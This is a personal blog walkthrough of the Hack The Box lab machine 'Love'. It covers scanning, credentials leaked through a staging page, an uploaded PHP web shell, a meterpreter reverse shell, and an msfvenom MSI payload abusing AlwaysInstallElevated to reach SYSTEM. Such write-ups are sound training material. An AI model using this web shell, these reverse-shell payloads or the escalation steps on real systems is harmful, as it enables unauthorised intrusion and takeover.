Hack The Box - Love

2021-08-27

This is my first blog post ever! Welcome! The below is a walk-through of the HackTheBox machine, Love.

Initial Scans

This is the initial nmap scan I ran for this host.

  80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
  | http-cookie-flags: 
  |   /: 
  |     PHPSESSID: 
  |_      httponly flag not set
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: Voting System using PHP
  135/tcp  open  msrpc        Microsoft Windows RPC
  139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
  443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: 403 Forbidden
  | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
  | Not valid before: 2021-01-18T14:00:16
  |_Not valid after:  2022-01-18T14:00:16
  |_ssl-date: TLS randomness does not represent time
  | tls-alpn: 
  |_  http/1.1
  445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
  3306/tcp open  mysql?
  | fingerprint-strings: 
  |   LPDString, ms-sql-s: 
  |_    Host '10.10.14.13' is not allowed to connect to this MariaDB server
  5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
  |_http-title: 403 Forbidden

I see the staging.love.htb, so I add it to my /etc/hosts file. Poking at the website, I see that it will take file urls...

When I tried to go to http://10.10.10.239:5000, I get a 403 status, so I put that into the Demo for the staging link and bam:

Vote Admin Creds admin: @LoveIsInTheAir!!!!

I also run gobuster on http://10.10.10.239 and find a /admin directory. Navigating to that, I see a similar Voter login, so I try the credentials I found. I'm logged in!

The rest of my gobuster output shows:

      /images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
      /index.php            (Status: 200) [Size: 4388]                                 
      /home.php             (Status: 302) [Size: 0] [--> index.php]                    
      /login.php            (Status: 302) [Size: 0] [--> index.php]                    
      /Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
      /admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] 
      /Home.php             (Status: 302) [Size: 0] [--> index.php]                    
      /plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
      /includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
      /Index.php            (Status: 200) [Size: 4388]                                   
      /Login.php            (Status: 302) [Size: 0] [--> index.php]                      
      /examples             (Status: 503) [Size: 402]                                    
      /logout.php           (Status: 302) [Size: 0] [--> index.php]                      
      /preview.php          (Status: 302) [Size: 0] [--> index.php]                      
      /dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]    
      /licenses             (Status: 403) [Size: 421]                                    
      /IMAGES               (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/]  
      /%20                  (Status: 403) [Size: 302] 

User.txt

Going to http://10.10.10.239/images/, I notice that there are images from the website on there... I see that I can upload images for my profile picture... so I try to upload a PHP variable to get a simple web shell.

I type up this quick php file:

<?php
system($_GET['k']);
?>

And then I upload it to the following location:

http://10.10.10.239/images/love.php?k=whoami
love\phoebe

Success! I now have a web shell that I can use for RCE.

http://10.10.10.239/images/love.php?k=type%20C:\Users\Phoebe\Desktop\user.txt

user.txt: b6287d277e097744b3bf61a9cffa784d

Access

I will now use my command injection to upload a meterpreter shell:

  Payload options (windows/x64/meterpreter_reverse_tcp):

     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     EXTENSIONS                   no        Comma-separate list of extensions to load
     EXTINIT                      no        Initialization strings for extensions
     LHOST       10.10.14.13      yes       The listen address (an interface may be specified)
     LPORT       4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target


  msf6 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 10.10.14.13:4444 
  [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.239:59663) at 2021-06-29 21:04:05 -0400

  meterpreter > getuid
  Server username: LOVE\Phoebe

Root.txt

Using the post/multi/recon/local_exploit_suggester. I see that the AlwaysInstallElevated privilege is being suggested.

Following this article, I decide to make a MSI payload using msfvenom: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.13 lport=1234 -f msi -o shell.msi

I open a second metasploit tab and put in the above options.

Then in my original session, I run:

  meterpreter > upload shell.msi

  meterpreter > shell

  msiexec /quiet /qn /i shell.msi

In my second meterpreter listener:

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > cat root.txt
  3bdedfec180220588404e92061564735

root.txt: 3bdedfec180220588404e92061564735